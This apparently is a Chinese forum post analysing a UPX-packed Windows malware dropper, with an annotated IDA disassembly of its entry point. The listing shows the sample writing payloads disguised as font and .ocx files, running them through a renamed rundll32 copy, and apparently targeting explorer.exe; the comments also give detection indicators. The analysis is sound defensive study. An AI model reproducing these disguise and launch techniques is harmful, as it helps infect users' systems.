由于是第一次在论坛发帖，只是练练逆向的水平，也是第一次分析这类病毒，不好的地方不要喷，谢谢。
IDA 分析如下：
UPX0:00401DA4 start proc near ; CODE XREF: UPX1:004136D8j
UPX0:00401DA4 ;-----------------------------------------------------------------------
UPX0:00401DA4 ; start -- dropper entry point (section UPX0, i.e. the code after the
UPX0:00401DA4 ; UPX stub has unpacked it). Observed behaviour, in order:
UPX0:00401DA4 ;   1. ChangeProcessToken; GetModuleFileNameA(NULL) -> own path.
UPX0:00401DA4 ;   2. Builds "<windir>\fonts\dbr07028.ttf" and passes it to
UPX0:00401DA4 ;      _CreateFile_Encryption.
UPX0:00401DA4 ;   3. Three times: CreateTempFile(NULL, "TLS", id, "<temp>\%08X<tag>.temp")
UPX0:00401DA4 ;      followed by MoveFileExA(temp, target, 3), with (id, target) =
UPX0:00401DA4 ;      (66h, "<dir>\dbr07028.ocx"), (65h, "<dir>\winnt.com"),
UPX0:00401DA4 ;      (67h, "<dir>\dbr99005.ocx").
UPX0:00401DA4 ;   4. CopyFileA("<dir>\rundll32.exe", "<dir>\gbvgbv07.exe", FALSE).
UPX0:00401DA4 ;   5. FindExplorer("explorer.exe", "<dir>\winnt.com").
UPX0:00401DA4 ;   6. If sub_401894(path) != 0, builds "<dir>\gbvgbv07.exe <path> <marker> ..."
UPX0:00401DA4 ;      with wsprintf and hands it to sub_401CAC, once per dropped .ocx,
UPX0:00401DA4 ;      then ExitProcess(0).
UPX0:00401DA4 ; "<dir>" is whatever MyGetWindowsDirectory prepends and "<temp>" whatever
UPX0:00401DA4 ; GetTempPath_Set prepends; neither body is in this listing -- the names
UPX0:00401DA4 ; suggest the Windows and temp directories, confirm in the callees.
UPX0:00401DA4 ; Registers: ebx = 0 for the whole function (NULL / NUL terminator / FALSE),
UPX0:00401DA4 ; esi = sprintf, later wsprintf; edi = rep stos pointer, then 260, then
UPX0:00401DA4 ; GetTickCount. ebx/esi/edi are pushed on entry; 0B5Ch bytes of locals.
UPX0:00401DA4 ; Detection notes: the fixed file names above, the "TLS" string with
UPX0:00401DA4 ; ids 65h/66h/67h, and the literal markers "pfjaoidjglkajd" /
UPX0:00401DA4 ; "pfjieaoidjglkajd" on the command line are stable indicators of
UPX0:00401DA4 ; this sample; a renamed copy of rundll32.exe in <dir> is the launcher.
UPX0:00401DA4 ; Several IDA auto-names below are wrong (hFile, hObject and
UPX0:00401DA4 ; nNumberOfBytesToWrite are all char buffers); see per-line comments.
UPX0:00401DA4 ;-----------------------------------------------------------------------
UPX0:00401DA4
UPX0:00401DA4 CommandLine= byte ptr -0B5Ch ; 520-byte buffer for the wsprintf'd command line
UPX0:00401DA4 var_B5B= byte ptr -0B5Bh ; = CommandLine+1, start of its zero-fill
UPX0:00401DA4 szCurrentModuleFileName= byte ptr -954h ; 260 bytes, own path from GetModuleFileNameA
UPX0:00401DA4 hFile= byte ptr -850h ; misnamed: 260-byte path, becomes "<windir>\fonts\dbr07028.ttf"
UPX0:00401DA4 szGbvgbv07= byte ptr -74Ch ; 260 bytes, "<dir>\gbvgbv07.exe"
UPX0:00401DA4 NewFileName= byte ptr -648h ; 260 bytes, "dbr07028.ocx" then "<dir>\dbr07028.ocx"
UPX0:00401DA4 FileName= byte ptr -544h ; 260 bytes, temp name "%08Xmdd.temp"
UPX0:00401DA4 Dest = byte ptr -440h ; 260 bytes, "dbr99005.ocx" then "<dir>\dbr99005.ocx"
UPX0:00401DA4 szIme_Temp= byte ptr -33Ch ; 260 bytes, reused for the ime / eime temp names
UPX0:00401DA4 hObject= byte ptr -238h ; misnamed: 260-byte buffer, "winnt.com" then "<dir>\winnt.com"
UPX0:00401DA4 Array_22E= byte ptr -22Eh ; = hObject+10, first byte after "winnt.com\0"
UPX0:00401DA4 szWindowsDirectory1= byte ptr -134h ; 260 bytes, "rundll32.exe" then "<dir>\rundll32.exe"
UPX0:00401DA4 Array_127= byte ptr -127h ; = szWindowsDirectory1+13, first byte after "rundll32.exe\0"
UPX0:00401DA4 szFileName= byte ptr -30h ; 20 bytes, "dbr07028" (base name, no extension)
UPX0:00401DA4 Exlorer.exe= byte ptr -1Ch ; 13-byte "explorer.exe\0", assembled from var_1B..var_10
UPX0:00401DA4 var_1B= byte ptr -1Bh
UPX0:00401DA4 var_1A= byte ptr -1Ah
UPX0:00401DA4 var_19= byte ptr -19h
UPX0:00401DA4 var_18= byte ptr -18h
UPX0:00401DA4 var_17= byte ptr -17h
UPX0:00401DA4 var_16= byte ptr -16h
UPX0:00401DA4 var_15= byte ptr -15h
UPX0:00401DA4 var_14= byte ptr -14h
UPX0:00401DA4 var_13= byte ptr -13h
UPX0:00401DA4 var_12= byte ptr -12h
UPX0:00401DA4 var_11= byte ptr -11h
UPX0:00401DA4 var_10= byte ptr -10h
UPX0:00401DA4 SzFontsDir= byte ptr -0Ch ; 8-byte "\fonts\\0"
UPX0:00401DA4 nNumberOfBytesToWrite= byte ptr -4 ; misnamed: 4-byte "TLS\0" passed to CreateTempFile
UPX0:00401DA4
UPX0:00401DA4 push ebp
UPX0:00401DA5 mov ebp, esp
UPX0:00401DA7 sub esp, 2908 ; 0B5Ch bytes of locals (layout above)
UPX0:00401DAD push ebx ; save callee-saved registers
UPX0:00401DAE push esi
UPX0:00401DAF push edi
UPX0:00401DB0 push 62 ; ecx = 62 dwords (248 bytes), set via push/pop
UPX0:00401DB2 xor ebx, ebx ; ebx = 0 for the rest of the function
UPX0:00401DB4 pop ecx
UPX0:00401DB5 xor eax, eax ; fill value 0
UPX0:00401DB7 lea edi, [ebp+Array_22E] ; edi = hObject+10, just past "winnt.com\0"
UPX0:00401DBD mov [ebp+hObject], 'w' ; hObject = "winnt.com", one byte at a time
UPX0:00401DC4 mov [ebp+hObject+1], 'i'
UPX0:00401DCB mov [ebp+hObject+2], 'n'
UPX0:00401DD2 mov [ebp+hObject+3], 'n'
UPX0:00401DD9 mov [ebp+hObject+4], 't'
UPX0:00401DE0 mov [ebp+hObject+5], '.'
UPX0:00401DE7 mov [ebp+hObject+6], 'c'
UPX0:00401DEE mov [ebp+hObject+7], 'o'
UPX0:00401DF5 mov [ebp+hObject+8], 'm'
UPX0:00401DFC mov [ebp+hObject+9], bl ; NUL terminator (bl = 0)
UPX0:00401E02 rep stosd ; zero the remaining 248 + 2 bytes: hObject is a 260-byte path buffer
UPX0:00401E04 stosw
UPX0:00401E06 push 64 ; memset(Dest, 0, 260): Dest[0] below, then 64*4 + 2 + 1 bytes
UPX0:00401E08 xor eax, eax
UPX0:00401E0A pop ecx
UPX0:00401E0B lea edi, [ebp+Dest+1]
UPX0:00401E11 mov [ebp+Dest], bl
UPX0:00401E17 mov esi, sprintf ; esi = sprintf for the calls that follow
UPX0:00401E1D rep stosd
UPX0:00401E1F stosw
UPX0:00401E21 stosb
UPX0:00401E22 push offset a005 ; "005"
UPX0:00401E27 lea eax, [ebp+Dest]
UPX0:00401E2D push offset Format ; "dbr99%s.ocx"
UPX0:00401E32 push eax ; Dest
UPX0:00401E33 mov [ebp+nNumberOfBytesToWrite], 'T' ; nNumberOfBytesToWrite is really the string "TLS\0" (see CreateTempFile below)
UPX0:00401E37 mov [ebp+nNumberOfBytesToWrite+1], 'L'
UPX0:00401E3B mov [ebp+nNumberOfBytesToWrite+2], 'S'
UPX0:00401E3F mov [ebp+nNumberOfBytesToWrite+3], bl
UPX0:00401E42 call esi ; sprintf ;
UPX0:00401E42 ; sprintf(Dest, "dbr99%s.ocx", "005") -> "dbr99005.ocx". Author: unclear why the name is split into a format string plus "005".
UPX0:00401E42 ;
UPX0:00401E44 add esp, 0Ch ; pop the 3 sprintf args (cdecl)
UPX0:00401E47 xor eax, eax ; memset(FileName, 0, 260), interleaved with two unrelated stores
UPX0:00401E49 lea edi, [ebp+FileName+1]
UPX0:00401E4F mov [ebp+FileName], bl
UPX0:00401E55 push 64
UPX0:00401E57 mov [ebp+szIme_Temp], bl ; szIme_Temp[0] = 0
UPX0:00401E5D pop ecx
UPX0:00401E5E mov [ebp+szWindowsDirectory1], 'r' ; first byte of "rundll32.exe" (rest below)
UPX0:00401E65 rep stosd
UPX0:00401E67 stosw
UPX0:00401E69 stosb
UPX0:00401E6A push 64 ; memset(szIme_Temp+1, 0, 259)
UPX0:00401E6C xor eax, eax
UPX0:00401E6E pop ecx
UPX0:00401E6F lea edi, [ebp+szIme_Temp+1]
UPX0:00401E75 rep stosd
UPX0:00401E77 stosw
UPX0:00401E79 stosb ;
UPX0:00401E79 ; The code above is two memset()s of 260-byte arrays; the compiler interleaved the instructions for pipelining, which makes it tedious to read.
UPX0:00401E7A push 61 ; ecx = 61 dwords; zero szWindowsDirectory1 bytes 13..259 (61*4 + 2 + 1 = 247)
UPX0:00401E7C xor eax, eax
UPX0:00401E7E pop ecx
UPX0:00401E7F lea edi, [ebp+Array_127] ; = szWindowsDirectory1+13
UPX0:00401E85 mov [ebp+szWindowsDirectory1+1], 'u' ; szWindowsDirectory1 = "rundll32.exe"
UPX0:00401E8C mov [ebp+szWindowsDirectory1+2], 'n'
UPX0:00401E93 mov [ebp+szWindowsDirectory1+3], 'd'
UPX0:00401E9A mov [ebp+szWindowsDirectory1+4], 'l'
UPX0:00401EA1 mov [ebp+szWindowsDirectory1+5], 'l'
UPX0:00401EA8 mov [ebp+szWindowsDirectory1+6], '3'
UPX0:00401EAF mov [ebp+szWindowsDirectory1+7], '2'
UPX0:00401EB6 mov [ebp+szWindowsDirectory1+8], '.'
UPX0:00401EBD mov [ebp+szWindowsDirectory1+9], 'e'
UPX0:00401EC4 mov [ebp+szWindowsDirectory1+0Ah], 'x'
UPX0:00401ECB mov [ebp+szWindowsDirectory1+0Bh], 'e'
UPX0:00401ED2 mov [ebp+szWindowsDirectory1+0Ch], bl ; NUL terminator
UPX0:00401ED8 rep stosd
UPX0:00401EDA stosw
UPX0:00401EDC stosb
UPX0:00401EDD push 64 ; memset(szGbvgbv07, 0, 260)
UPX0:00401EDF xor eax, eax
UPX0:00401EE1 pop ecx
UPX0:00401EE2 lea edi, [ebp+szGbvgbv07+1]
UPX0:00401EE8 mov [ebp+szGbvgbv07], bl
UPX0:00401EEE rep stosd
UPX0:00401EF0 stosw
UPX0:00401EF2 stosb
UPX0:00401EF3 call ChangeProcessToken ; adjusts the process token privileges (author's name for the routine; body not shown)
UPX0:00401EF8 mov edi, 260 ; MAX_PATH, reused as nSize / uSize below
UPX0:00401EFD lea eax, [ebp+szCurrentModuleFileName]
UPX0:00401F03 push edi ; nSize = 260
UPX0:00401F04 push eax ; lpFilename
UPX0:00401F05 push ebx ; hModule = NULL
UPX0:00401F06 call GetModuleFileNameA ;
UPX0:00401F06 ; GetModuleFileNameA(NULL, szCurrentModuleFileName, 260): full path of a loaded module; hModule = NULL means the current executable (stdcall, no esp fix-up needed).
UPX0:00401F0C lea eax, [ebp+szFileName]
UPX0:00401F0F push offset aDbr07028 ; "dbr07028"
UPX0:00401F14 push eax ; Dest
UPX0:00401F15 call esi ; sprintf ;
UPX0:00401F15 ; sprintf(szFileName, "dbr07028") -- no format arguments, effectively a string copy
UPX0:00401F17 lea eax, [ebp+szFileName]
UPX0:00401F1A push eax
UPX0:00401F1B lea eax, [ebp+NewFileName]
UPX0:00401F21 push eax
UPX0:00401F22 call _mbscpy ;
UPX0:00401F22 ; _mbscpy(NewFileName, szFileName) -> "dbr07028"
UPX0:00401F27 lea eax, [ebp+NewFileName]
UPX0:00401F2D push offset a_ocx ; ".ocx"
UPX0:00401F32 push eax
UPX0:00401F33 call _mbscat ;
UPX0:00401F33 ; _mbscat(NewFileName, ".ocx") -> "dbr07028.ocx" (string concatenation)
UPX0:00401F38 lea eax, [ebp+NewFileName]
UPX0:00401F3E push eax
UPX0:00401F3F lea eax, [ebp+NewFileName]
UPX0:00401F45 push eax
UPX0:00401F46 call MyGetWindowsDirectory ;
UPX0:00401F46 ; MyGetWindowsDirectory(NewFileName, NewFileName). Author wondered why the same address is passed twice (in and out). The call at 00402102 passes a literal name as the 1st arg and a separate buffer as the 2nd, so the routine looks like (src_name, dst_buf) -> dst = "<dir>\" + src; here it is simply used in place.
UPX0:00401F46 ; Result: the full path of the .ocx the dropper is about to write.
UPX0:00401F4B lea eax, [ebp+szCurrentModuleFileName]
UPX0:00401F51 push eax ; NumberOfBytesRead ; IDA label is wrong: this is the module path
UPX0:00401F52 call Decrypt_PostAddress ;
UPX0:00401F52 ; Decrypt_PostAddress(szCurrentModuleFileName): per the author, decrypts some embedded data and checks whether the sample has been unpacked (body not shown).
UPX0:00401F57 add esp, 24h ; 36 bytes = sprintf(2) + _mbscpy(2) + _mbscat(2) + MyGetWindowsDirectory(2) + Decrypt_PostAddress(1)
UPX0:00401F5A lea eax, [ebp+hFile]
UPX0:00401F60 mov [ebp+SzFontsDir], '\' ; SzFontsDir = "\fonts\"
UPX0:00401F64 mov [ebp+SzFontsDir+1], 'f'
UPX0:00401F68 push edi ; uSize = 260
UPX0:00401F69 push eax ; lpBuffer = hFile (a path buffer, not a handle)
UPX0:00401F6A mov [ebp+SzFontsDir+2], 'o'
UPX0:00401F6E mov [ebp+SzFontsDir+3], 'n'
UPX0:00401F72 mov [ebp+SzFontsDir+4], 't'
UPX0:00401F76 mov [ebp+SzFontsDir+5], 's'
UPX0:00401F7A mov [ebp+SzFontsDir+6], '\'
UPX0:00401F7E mov [ebp+SzFontsDir+7], bl ; NUL terminator
UPX0:00401F81 call GetWindowsDirectoryA ; hFile = "<windir>"
UPX0:00401F87 lea eax, [ebp+SzFontsDir]
UPX0:00401F8A push eax
UPX0:00401F8B lea eax, [ebp+hFile]
UPX0:00401F91 push eax
UPX0:00401F92 call _mbscat ;
UPX0:00401F92 ; _mbscat(hFile, "\fonts\") -> "<windir>\fonts\". Author: presumably a directory to be created under the Windows directory; only the path is built here.
UPX0:00401F97 lea eax, [ebp+szFileName]
UPX0:00401F9A push eax
UPX0:00401F9B lea eax, [ebp+hFile]
UPX0:00401FA1 push eax
UPX0:00401FA2 call _mbscat ;
UPX0:00401FA2 ; + "dbr07028"
UPX0:00401FA7 lea eax, [ebp+hFile]
UPX0:00401FAD push offset a_ttf ; ".ttf"
UPX0:00401FB2 push eax
UPX0:00401FB3 call _mbscat ;
UPX0:00401FB3 ; + ".ttf" -> "<windir>\fonts\dbr07028.ttf"
UPX0:00401FB8 lea eax, [ebp+hFile]
UPX0:00401FBE push eax ; hFile ; the path string, not a handle
UPX0:00401FBF call _CreateFile_Encryption ; creates / writes that .ttf path (author's name for the routine; what it writes is not shown here)
UPX0:00401FC4 mov edi, GetTickCount ; edi = GetTickCount for the three calls below
UPX0:00401FCA add esp, 1Ch ; 28 bytes = 3 x _mbscat(2) + _CreateFile_Encryption(1)
UPX0:00401FCD call edi ; GetTickCount ; ms since boot; used as a pseudo-random tag in the temp-file names
UPX0:00401FCF push eax
UPX0:00401FD0 lea eax, [ebp+FileName]
UPX0:00401FD6 push offset a08xmdd_temp ; "%08Xmdd.temp"
UPX0:00401FDB push eax ; Dest
UPX0:00401FDC call esi ; sprintf ;
UPX0:00401FDC ; sprintf(FileName, "%08Xmdd.temp", GetTickCount())
UPX0:00401FDE lea eax, [ebp+FileName]
UPX0:00401FE4 push eax
UPX0:00401FE5 lea eax, [ebp+FileName]
UPX0:00401FEB push eax
UPX0:00401FEC call GetTempPath_Set ; GetTempPath_Set(FileName, FileName): presumably prepends the temp directory in place (body not shown)
UPX0:00401FF1 lea eax, [ebp+FileName]
UPX0:00401FF7 push eax ; lpFileName
UPX0:00401FF8 lea eax, [ebp+nNumberOfBytesToWrite]
UPX0:00401FFB push 66h ; NumberOfBytesWritten ; IDA label is wrong: a small integer id (102)
UPX0:00401FFD push eax ; nNumberOfBytesToWrite ; actually the string "TLS"
UPX0:00401FFE push ebx ; hModule = NULL
UPX0:00401FFF call CreateTempFile ;
UPX0:00401FFF ; CreateTempFile(NULL, "TLS", 66h, FileName). Author: the arguments look like CreateFile parameters. NOTE(review): a NULL module, a type string and a small id look more like an embedded-resource lookup whose payload is written to FileName -- confirm in the callee.
UPX0:00402004 add esp, 24h ; 36 bytes = sprintf(3) + GetTempPath_Set(2) + CreateTempFile(4)
UPX0:00402007 lea eax, [ebp+NewFileName]
UPX0:0040200D push 3 ; dwFlags = MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED
UPX0:0040200F push eax ; lpNewFileName = "<dir>\dbr07028.ocx"
UPX0:00402010 lea eax, [ebp+FileName]
UPX0:00402016 push eax ; lpExistingFileName = "<temp>\%08Xmdd.temp"
UPX0:00402017 call MoveFileExA ; move the temp file onto the target, overwriting it if it already exists
UPX0:0040201D call edi ; GetTickCount
UPX0:0040201F push eax
UPX0:00402020 lea eax, [ebp+szIme_Temp]
UPX0:00402026 push offset a08xime_temp ; "%08Xime.temp"
UPX0:0040202B push eax ; Dest
UPX0:0040202C call esi ; sprintf ; same temp-file sequence again: sprintf(szIme_Temp, "%08Xime.temp", tick)
UPX0:0040202E lea eax, [ebp+szIme_Temp]
UPX0:00402034 push eax
UPX0:00402035 lea eax, [ebp+szIme_Temp]
UPX0:0040203B push eax
UPX0:0040203C call GetTempPath_Set
UPX0:00402041 lea eax, [ebp+szIme_Temp]
UPX0:00402047 push eax ; lpFileName
UPX0:00402048 lea eax, [ebp+nNumberOfBytesToWrite]
UPX0:0040204B push 65h ; NumberOfBytesWritten ; id 101 this time
UPX0:0040204D push eax ; nNumberOfBytesToWrite ; "TLS"
UPX0:0040204E push ebx ; hModule = NULL
UPX0:0040204F call CreateTempFile ; CreateTempFile(NULL, "TLS", 65h, szIme_Temp)
UPX0:00402054 lea eax, [ebp+hObject]
UPX0:0040205A push eax
UPX0:0040205B lea eax, [ebp+hObject]
UPX0:00402061 push eax
UPX0:00402062 call MyGetWindowsDirectory ; hObject = "<dir>\winnt.com"
UPX0:00402067 add esp, 2Ch ; 44 bytes = sprintf(3) + GetTempPath_Set(2) + CreateTempFile(4) + MyGetWindowsDirectory(2)
UPX0:0040206A lea eax, [ebp+hObject]
UPX0:00402070 push 3 ; dwFlags = MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED
UPX0:00402072 push eax ; lpNewFileName = "<dir>\winnt.com"
UPX0:00402073 lea eax, [ebp+szIme_Temp]
UPX0:00402079 push eax ; lpExistingFileName = "<temp>\%08Xime.temp"
UPX0:0040207A call MoveFileExA
UPX0:00402080 call edi ; GetTickCount
UPX0:00402082 push eax
UPX0:00402083 lea eax, [ebp+szIme_Temp]
UPX0:00402089 push offset a08xeime_temp ; "%08Xeime.temp"
UPX0:0040208E push eax ; Dest
UPX0:0040208F call esi ; sprintf ; third temp file: sprintf(szIme_Temp, "%08Xeime.temp", tick)
UPX0:00402091 lea eax, [ebp+szIme_Temp]
UPX0:00402097 push eax
UPX0:00402098 lea eax, [ebp+szIme_Temp]
UPX0:0040209E push eax
UPX0:0040209F call GetTempPath_Set
UPX0:004020A4 lea eax, [ebp+szIme_Temp]
UPX0:004020AA push eax ; lpFileName
UPX0:004020AB lea eax, [ebp+nNumberOfBytesToWrite]
UPX0:004020AE push 67h ; NumberOfBytesWritten ; id 103
UPX0:004020B0 push eax ; nNumberOfBytesToWrite ; "TLS"
UPX0:004020B1 push ebx ; hModule = NULL
UPX0:004020B2 call CreateTempFile ; CreateTempFile(NULL, "TLS", 67h, szIme_Temp)
UPX0:004020B7 lea eax, [ebp+Dest]
UPX0:004020BD push eax
UPX0:004020BE lea eax, [ebp+Dest]
UPX0:004020C4 push eax
UPX0:004020C5 call MyGetWindowsDirectory ; Dest = "<dir>\dbr99005.ocx" (author: gets the system directory)
UPX0:004020CA add esp, 2Ch ; 44 bytes, same four calls as above
UPX0:004020CD lea eax, [ebp+Dest]
UPX0:004020D3 push 3 ; dwFlags = MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED
UPX0:004020D5 push eax ; lpNewFileName = "<dir>\dbr99005.ocx"
UPX0:004020D6 lea eax, [ebp+szIme_Temp]
UPX0:004020DC push eax ; lpExistingFileName = "<temp>\%08Xeime.temp"
UPX0:004020DD call MoveFileExA ; author: moves the just-created ime temp file into the target directory; the target here is "<dir>\dbr99005.ocx"
UPX0:004020E3 lea eax, [ebp+szWindowsDirectory1]
UPX0:004020E9 push eax
UPX0:004020EA lea eax, [ebp+szWindowsDirectory1]
UPX0:004020F0 push eax
UPX0:004020F1 call MyGetWindowsDirectory ; szWindowsDirectory1 = "<dir>\rundll32.exe"
UPX0:004020F6 lea eax, [ebp+szGbvgbv07]
UPX0:004020FC push eax ; 2nd arg: output buffer
UPX0:004020FD push offset aGbvgbv07_exe ; "gbvgbv07.exe" ; 1st arg: source name
UPX0:00402102 call MyGetWindowsDirectory ; MyGetWindowsDirectory("gbvgbv07.exe", szGbvgbv07): src and dst differ here, which pins the (src_name, dst_buf) argument order. Author: this routine is called many times and each call creates something on the system -- step through it under OD to confirm.
UPX0:00402107 add esp, 10h ; 16 bytes = 2 x MyGetWindowsDirectory(2)
UPX0:0040210A lea eax, [ebp+szGbvgbv07]
UPX0:00402110 push ebx ; bFailIfExists = FALSE
UPX0:00402111 push eax ; lpNewFileName = "<dir>\gbvgbv07.exe"
UPX0:00402112 lea eax, [ebp+szWindowsDirectory1]
UPX0:00402118 push eax ; lpExistingFileName = "<dir>\rundll32.exe"
UPX0:00402119 call CopyFileA ; copies the system's rundll32.exe under a new name; the command lines built below run this copy, so the process name does not read as rundll32
UPX0:0040211F lea eax, [ebp+hObject]
UPX0:00402125 mov [ebp+Exlorer.exe], 'e' ; Exlorer.exe = "explorer.exe" (var_1B..var_10 are its remaining bytes)
UPX0:00402129 push eax ; hObject ; 2nd arg = "<dir>\winnt.com"
UPX0:0040212A lea eax, [ebp+Exlorer.exe]
UPX0:0040212D push eax ; Exlorer.exe ; 1st arg = "explorer.exe"
UPX0:0040212E mov [ebp+var_1B], 'x'
UPX0:00402132 mov [ebp+var_1A], 'p'
UPX0:00402136 mov [ebp+var_19], 'l'
UPX0:0040213A mov [ebp+var_18], 'o'
UPX0:0040213E mov [ebp+var_17], 'r'
UPX0:00402142 mov [ebp+var_16], 'e'
UPX0:00402146 mov [ebp+var_15], 'r'
UPX0:0040214A mov [ebp+var_14], '.'
UPX0:0040214E mov [ebp+var_13], 'e'
UPX0:00402152 mov [ebp+var_12], 'x'
UPX0:00402156 mov [ebp+var_11], 'e'
UPX0:0040215A mov [ebp+var_10], bl ; NUL terminator
UPX0:0040215D call FindExplorer ; FindExplorer("explorer.exe", "<dir>\winnt.com"). Author: looks like it targets explorer.exe for injection; the body is not shown, so what it does with the winnt.com path is unconfirmed.
UPX0:00402162 mov ecx, 81h ; 129 dwords: memset(CommandLine, 0, 520)
UPX0:00402167 xor eax, eax
UPX0:00402169 lea edi, [ebp+var_B5B] ; = CommandLine+1
UPX0:0040216F mov [ebp+CommandLine], bl
UPX0:00402175 rep stosd
UPX0:00402177 stosw
UPX0:00402179 stosb
UPX0:0040217A lea eax, [ebp+NewFileName]
UPX0:00402180 push eax ; lpFileName = "<dir>\dbr07028.ocx"
UPX0:00402181 call sub_401894 ; sub_401894(path) -> eax; IDA labels the arg lpFileName, so presumably a check on the dropped file (body not shown)
UPX0:00402186 mov esi, WsPrintf ; esi now = wsprintf
UPX0:0040218C add esp, 0Ch ; 12 bytes = FindExplorer(2) + sub_401894(1)
UPX0:0040218F test eax, eax
UPX0:00402191 jz short loc_4021C5 ; skip the first launch when the check fails
UPX0:00402193 lea eax, [ebp+szCurrentModuleFileName]
UPX0:00402199 push eax ; _DWORD ; 3rd %s = own path
UPX0:0040219A lea eax, [ebp+NewFileName]
UPX0:004021A0 push eax ; _DWORD ; 2nd %s = "<dir>\dbr07028.ocx"
UPX0:004021A1 lea eax, [ebp+szGbvgbv07]
UPX0:004021A7 push eax ; _DWORD ; 1st %s = "<dir>\gbvgbv07.exe"
UPX0:004021A8 lea eax, [ebp+CommandLine]
UPX0:004021AE push offset aSSPfjaoidjglka ; "%s %s pfjaoidjglkajd %s"
UPX0:004021B3 push eax ; _DWORD
UPX0:004021B4 call esi ; WsPrintf ; wsprintf(CommandLine, "%s %s pfjaoidjglkajd %s", gbvgbv07.exe path, dbr07028.ocx path, own path)
UPX0:004021B6 lea eax, [ebp+CommandLine]
UPX0:004021BC push eax ; lpCommandLine
UPX0:004021BD call sub_401CAC ; sub_401CAC(CommandLine): IDA labels the arg lpCommandLine; presumably launches it (body not shown)
UPX0:004021C2 add esp, 18h ; 24 bytes = wsprintf(5) + sub_401CAC(1)
UPX0:004021C5
UPX0:004021C5 loc_4021C5: ; CODE XREF: start+3EDj
UPX0:004021C5 lea eax, [ebp+Dest]
UPX0:004021CB push eax ; lpFileName = "<dir>\dbr99005.ocx"
UPX0:004021CC call sub_401894 ; same check on the second .ocx
UPX0:004021D1 test eax, eax
UPX0:004021D3 pop ecx ; discard the single 4-byte arg (flags from test survive pop)
UPX0:004021D4 jz short loc_402201
UPX0:004021D6 lea eax, [ebp+Dest]
UPX0:004021DC push eax ; _DWORD ; 2nd %s = "<dir>\dbr99005.ocx"
UPX0:004021DD lea eax, [ebp+szGbvgbv07]
UPX0:004021E3 push eax ; _DWORD ; 1st %s = "<dir>\gbvgbv07.exe"
UPX0:004021E4 lea eax, [ebp+CommandLine]
UPX0:004021EA push offset aSSPfjieaoidjgl ; "%s %s pfjieaoidjglkajd"
UPX0:004021EF push eax ; _DWORD
UPX0:004021F0 call esi ; WsPrintf ; wsprintf(CommandLine, "%s %s pfjieaoidjglkajd", gbvgbv07.exe path, dbr99005.ocx path)
UPX0:004021F2 lea eax, [ebp+CommandLine]
UPX0:004021F8 push eax ; lpCommandLine
UPX0:004021F9 call sub_401CAC
UPX0:004021FE add esp, 14h ; 20 bytes = wsprintf(4) + sub_401CAC(1)
UPX0:00402201
UPX0:00402201 loc_402201: ; CODE XREF: start+430j
UPX0:00402201 push ebx ; uExitCode = 0
UPX0:00402202 call ExitProcess ; never returns; everything after this is dead code
UPX0:00402208 ; ---------------------------------------------------------------------------
UPX0:00402208 push 1 ; unreachable compiler-generated epilogue: eax = 1
UPX0:0040220A pop eax
UPX0:0040220B pop edi
UPX0:0040220C pop esi
UPX0:0040220D pop ebx
UPX0:0040220E leave
UPX0:0040220E start endp ; sp-analysis failed ; because ExitProcess is a no-return call, IDA cannot balance the stack across it
UPX0:0040220E
UPX0:0040220F retn 10h ; would pop 16 bytes of caller args: consistent with a 4-argument stdcall entry such as WinMain (unreachable)